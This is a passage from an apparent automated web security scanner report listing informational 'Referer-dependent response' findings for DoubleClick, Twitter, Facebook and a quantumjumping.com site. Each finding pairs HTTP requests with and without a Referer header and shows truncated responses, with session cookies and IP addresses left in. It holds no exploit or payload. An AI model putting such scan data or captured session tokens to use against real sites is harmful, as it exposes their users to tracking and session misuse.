Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

19. Referer-dependent response  previous  next
There are 8 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



19.1. http://ad.doubleclick.net/adi/N3671.SD148013N3671SN0/B5403038.2  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.SD148013N3671SN0/B5403038.2

Request 1

GET /adi/N3671.SD148013N3671SN0/B5403038.2;sz=728x90;pc=cbs509675;click0=http://adlog.com.com/adlog/e/r=19884&sg=509675&o=17939%253a&h=cn&p=2&b=5&l=en_US&site=109&pt=8300&nd=17939&pid=&cid=2&pp=100&e=3&rqid=01phx1-ad-e16:4DC066DE4A09DD&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=LcGErAoOYI4AAGp4RtMAAAIs&t=2011.05.04.01.28.49&event=58/;ord=2011.05.04.01.28.49? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 04 May 2011 01:28:54 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 8001

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generate
...[SNIP]...
p://s0.2mdn.net/998766/1035_728x90_Spring_Largest4GNetwork_7999_Static.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BlIsi1qvATfSjL82k6QbSwuz8CwAAAAAQASAAOABQ46aDH1iuqvQTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgENbmV3cy5jbmV0LmNvbcgBCdoBHWh0dHA6Ly9uZXdzLmNuZXQuY29tL3dlYndhcmUvwAICqAMB2ASAreIE4AQCmgUXCJPxLRCyvfsdGIiGvnIgrqr0Eyju-jzaBQIIAA&num=0&sig=AGiWqtxOir7CV5osoEXucktqWE03MrM3Og&client=&adurl=http://adlog.com.com/adlog/e/r%3D19884%26sg%3D509675%26o%3D17939%25253a%26h%3Dcn%26p%3D2%26b%3D5%26l%3Den_US%26site%3D109%26pt%3D8300%26nd%3D17939%26pid%3D%26cid%3D2%26pp%3D100%26e%3D3%26rqid%3D01phx1-ad-e16:4DC066DE4A09DD%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DLcGErAoOYI4AAGp4RtMAAAIs%26t%3D2011.05.04.01.28.49%26event%3D58/http://deals.t-mobile.com/plans%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLjI9.99CjCI999JW1jmfzEpzypl");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BlIsi1qvATfSjL82k6QbSwuz8CwAAAAAQASAAOABQ46aDH1iuqvQTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgENbmV3cy5jbmV0LmNvbcgBCdoBHWh0dHA6Ly9uZXdzLmNuZXQuY29tL3dlYndhcmUvwAICqAMB2ASAreIE4AQCmgUXCJPxLRCyvfsdGIiGvnIgrqr0Eyju-jzaBQIIAA&num=0&sig=AGiWqtxOir7CV5osoEXucktqWE03MrM3Og&client=&adurl=http://adlog.com.com/adlog/e/r%3D19884%26sg%3D509675%26o%3D17939%25253a%26h%3Dcn%26p%3D2%26b%3D5%26l%3Den_US%26site%3D109%26pt%3D8300%26nd%3D17939%26pid%3D%26cid%3D2%26pp%3D100%26e%3D3%26rqid%3D01phx1-ad-e16:4DC066DE4A09DD%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DLcGErAoOYI4AAGp4RtMAAAIs%26t%3D2011.05.04.01.28.49%26event%3D58/http://deals.t-mobile.com/plans%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLjI9.99CjCI999JW1jmfzEpzypl");
var ctp=new Array();
var ctv=new Array();
ctp[0]
...[SNIP]...

Request 2

GET /adi/N3671.SD148013N3671SN0/B5403038.2;sz=728x90;pc=cbs509675;click0=http://adlog.com.com/adlog/e/r=19884&sg=509675&o=17939%253a&h=cn&p=2&b=5&l=en_US&site=109&pt=8300&nd=17939&pid=&cid=2&pp=100&e=3&rqid=01phx1-ad-e16:4DC066DE4A09DD&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=LcGErAoOYI4AAGp4RtMAAAIs&t=2011.05.04.01.28.49&event=58/;ord=2011.05.04.01.28.49? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 04 May 2011 01:29:53 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7745

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generate
...[SNIP]...
p://s0.2mdn.net/998766/1035_728x90_Spring_Largest4GNetwork_7999_Static.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BYIIFEazATam2Oc2k6QbSwuz8CwAAAAAQASAAOABQ46aDH1iuqvQTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCJPxLRCyvfsdGIiGvnIgrqr0Eyju-jzaBQIIAA&num=0&sig=AGiWqtxiknXXqZdE-zeAWtjLr5mE2GvlVw&client=&adurl=http://adlog.com.com/adlog/e/r%3D19884%26sg%3D509675%26o%3D17939%25253a%26h%3Dcn%26p%3D2%26b%3D5%26l%3Den_US%26site%3D109%26pt%3D8300%26nd%3D17939%26pid%3D%26cid%3D2%26pp%3D100%26e%3D3%26rqid%3D01phx1-ad-e16:4DC066DE4A09DD%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DLcGErAoOYI4AAGp4RtMAAAIs%26t%3D2011.05.04.01.28.49%26event%3D58/http://deals.t-mobile.com/plans%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLjI9.99CjCI999JW1jmfzEpzypl");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BYIIFEazATam2Oc2k6QbSwuz8CwAAAAAQASAAOABQ46aDH1iuqvQTYMnug4jwo-wSggEJY2EtZ29vZ2xlyAEJwAICqAMB2ASAreIE4AQCmgUXCJPxLRCyvfsdGIiGvnIgrqr0Eyju-jzaBQIIAA&num=0&sig=AGiWqtxiknXXqZdE-zeAWtjLr5mE2GvlVw&client=&adurl=http://adlog.com.com/adlog/e/r%3D19884%26sg%3D509675%26o%3D17939%25253a%26h%3Dcn%26p%3D2%26b%3D5%26l%3Den_US%26site%3D109%26pt%3D8300%26nd%3D17939%26pid%3D%26cid%3D2%26pp%3D100%26e%3D3%26rqid%3D01phx1-ad-e16:4DC066DE4A09DD%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3D%26cpnmodule%3D%26count%3D%26ra%3D173.193.214.243%26pg%3DLcGErAoOYI4AAGp4RtMAAAIs%26t%3D2011.05.04.01.28.49%26event%3D58/http://deals.t-mobile.com/plans%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLjI9.99CjCI999JW1jmfzEpzypl");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag";
ctv[1] = "";
ctp[2] = "clickTag";
ctv[2] = "";


var fv='"moviePath='
...[SNIP]...

19.2. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Request 1

GET /1/statuses/user_timeline.json?screen_name=BurtGoldman&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304488441548=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 1

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304470443-61830-19084
X-RateLimit-Limit: 150
ETag: "dd68325e1e1b5638c5389e4667a03d55"-gzip
Last-Modified: Wed, 04 May 2011 00:54:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.03865
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114cafd8234
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 66b24857cdd9bcac2a95764546ecce88dea50cec
X-RateLimit-Reset: 1304474043
Set-Cookie: k=173.193.214.243.1304470443781224; path=/; expires=Wed, 11-May-11 00:54:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr%2FtFJS817TPehDfOh7Oz%2FB4ymznqD0OvVyy7XSdf6Js7w%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAxXf7gvAToHaWQiJWUyZjE0MDNlMDAzMWRk%250AMTkyYThiYjdkYTZmMTg0ZGJhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b0bc3bdcb0dce34b76541769069a6e9c050baa72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 9192

TWTR.Widget.receiveCallback_1([{"text":"Energy and Healing \u201cDear Burt\u201d Volume 81 http:\/\/bit.ly\/lZE1j8","truncated":false,"place":null,"coordinates":null,"favorited":false,"id_str":"63896105380876289","retweet_count":0,"source":"\u003Ca href=\"http:\/\/twitterfeed.com\" rel=\"nofollow\"\u003Etwitterfeed\u003C\/a\u003E","created_at":"Fri Apr 29 09:23:13 +0000 2011","geo":null,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_status_id":null,"in_reply_to_user_id_str":null,"in_reply_to_user_id":null,"user":{"default_profile":true,"profile_use_background_image":true,"location":"California","show_all_inline_media":false,"follow_request_sent":null,"lang":"en","geo_enabled":true,"profile_background_color":"C0DEED","description":"Burt Goldman, also known as The American Monk, is an energy healer, spiritual master, author, meditation expert, painter and the creator of Quantum Jumping.","profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303425044\/images\/themes\/theme1\/bg.png","url":"http:\/\/blog.theamericanmonk.com","verified":false,"id_str":"49361087","is_translator":false,"statuses_count":255,"created_at":"Sun Jun 21 16:52:05 +0000 2009","profile_text_color":"333333","listed_count":25,"profile_sidebar_fill_color":"DDEEF6","following":null,"profile_background_tile":false,"favourites_count":0,"protected":false,"notifications":null,"time
...[SNIP]...

Request 2

GET /1/statuses/user_timeline.json?screen_name=BurtGoldman&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304488441548=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response 2

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304470451-6591-49823
X-RateLimit-Limit: 150
ETag: "dd68325e1e1b5638c5389e4667a03d55"-gzip
Last-Modified: Wed, 04 May 2011 00:54:11 GMT
X-RateLimit-Remaining: 124
X-Runtime: 0.01511
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114cafd8234
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 1fc2d5bfefa748d547bec018d9ddb5f1dffc236c
X-RateLimit-Reset: 1304474043
Set-Cookie: k=173.193.214.243.1304470451347884; path=/; expires=Wed, 11-May-11 00:54:11 GMT; domain=.twitter.com
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJl0f7gvAToHaWQiJTQ5Yzk4ZDkzMzRhMDJm%250AZTgzYjI5Yjg5YjY4YWQ2NDYyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--4c6fb6a9aa59147737dabaf92175ef066f42d601; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 9192

TWTR.Widget.receiveCallback_1([{"text":"Energy and Healing \u201cDear Burt\u201d Volume 81 http:\/\/bit.ly\/lZE1j8","truncated":false,"place":null,"coordinates":null,"favorited":false,"id_str":"63896105380876289","retweet_count":0,"source":"\u003Ca href=\"http:\/\/twitterfeed.com\" rel=\"nofollow\"\u003Etwitterfeed\u003C\/a\u003E","created_at":"Fri Apr 29 09:23:13 +0000 2011","geo":null,"in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_status_id":null,"in_reply_to_user_id_str":null,"in_reply_to_user_id":null,"user":{"default_profile":true,"profile_use_background_image":true,"location":"California","show_all_inline_media":false,"follow_request_sent":null,"lang":"en","geo_enabled":true,"profile_background_color":"C0DEED","description":"Burt Goldman, also known as The American Monk, is an energy healer, spiritual master, author, meditation expert, painter and the creator of Quantum Jumping.","profile_background_image_url":"http:\/\/a3.twimg.com\/a\/1303425044\/images\/themes\/theme1\/bg.png","url":"http:\/\/blog.theamericanmonk.com","verified":false,"id_str":"49361087","is_translator":false,"statuses_count":255,"created_at":"Sun Jun 21 16:52:05 +0000 2009","profile_text_color":"333333","listed_count":25,"profile_sidebar_fill_color":"DDEEF6","following":null,"profile_background_tile":false,"favourites_count":0,"protected":false,"notifications":null,"time_zone":"Pacific Time (US & Canada)","friends_count":1,"profile_link_color":"0084B4","profile_image_url"
...[SNIP]...

19.3. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.154.31
X-Cnection: close
Date: Wed, 04 May 2011 00:53:33 GMT
Content-Length: 6433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dc0a38d03b971689587157" class="connect_widget button_count" style="font-family: &quot;lucida grande&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"296c5542",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:373353,vip:"69.171.224.13",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"ae083",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.ph
...[SNIP]...

Request 2

GET /plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.178.41
X-Cnection: close
Date: Wed, 04 May 2011 00:53:43 GMT
Content-Length: 6402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dc0a3977a9015296702738" class="connect_widget button_count" style="font-family: &quot;lucida grande&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"f91b9975",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:373353,vip:"69.171.224.13",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"yeP5w",lhsh:"ae083",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.ph
...[SNIP]...

19.4. http://www.quantumjumping.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.quantumjumping.com
Path:   /

Request 1

GET /?whisper_action=1&target=Style&request=css HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:53:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: referrer=http%3A%2F%2Fwww.quantumjumping.com%2Fblog%2F; expires=Wed, 04-May-2011 03:53:56 GMT; path=/; domain=www.quantumjumping.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" >
<head>
               <script type="text/javascript">
       <!--//
       try {
        if (top.location.hostname != self.location.hostname) throw 1;
       } catch (e) {
        top.location.href = self.location.href;
       }
        //-->
       </script>
<title>Quantum Jumping - Communicate With Your Subconscious Mind</title>
<!-- meta tags start -->
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="all" />
<meta name="description" content="Discover Quantum Jumping. Jump Into a Universe of Infinite Possibilities & Learn to Be a Master of Your Mind. Sign up for the Free Introductory Course" />
<meta name="keywords" content="Quantum Jumping,Burt Goldman, Parallel-Universes, Astral Projection, Master Skill," />
        <!-- meta tags end -->
<style type="text/css">
<!--
@import url("/media/themes/prodigy/common.css");
@import url("/media/themes/qja.css");
-->
</style>
<!-- style end -->

<!--[if lte IE 6]><style type="text/css" media="all">
@import url("/media/themes/ie6.css");
</style><![endif]-->

<!--[if IE 7.0]><style type="text/css" media="all">
@import url("/media/themes/ie7.css");
</style><![endif]-->

<!--[if IE]>
           <style type="text/css" media="all">
    @import url("/media/themes/ie.css");
    </style>
           <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
       <![endif]-->


...[SNIP]...

Request 2

GET /?whisper_action=1&target=Style&request=css HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=109405658.1304487910.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utma=109405658.2119760510.1304487910.1304487910.1304487910.1; __utmc=109405658; __utmb=109405658.4.10.1304487910; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000

Response 2

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:54:30 GMT
Content-Type: text/html
Connection: close
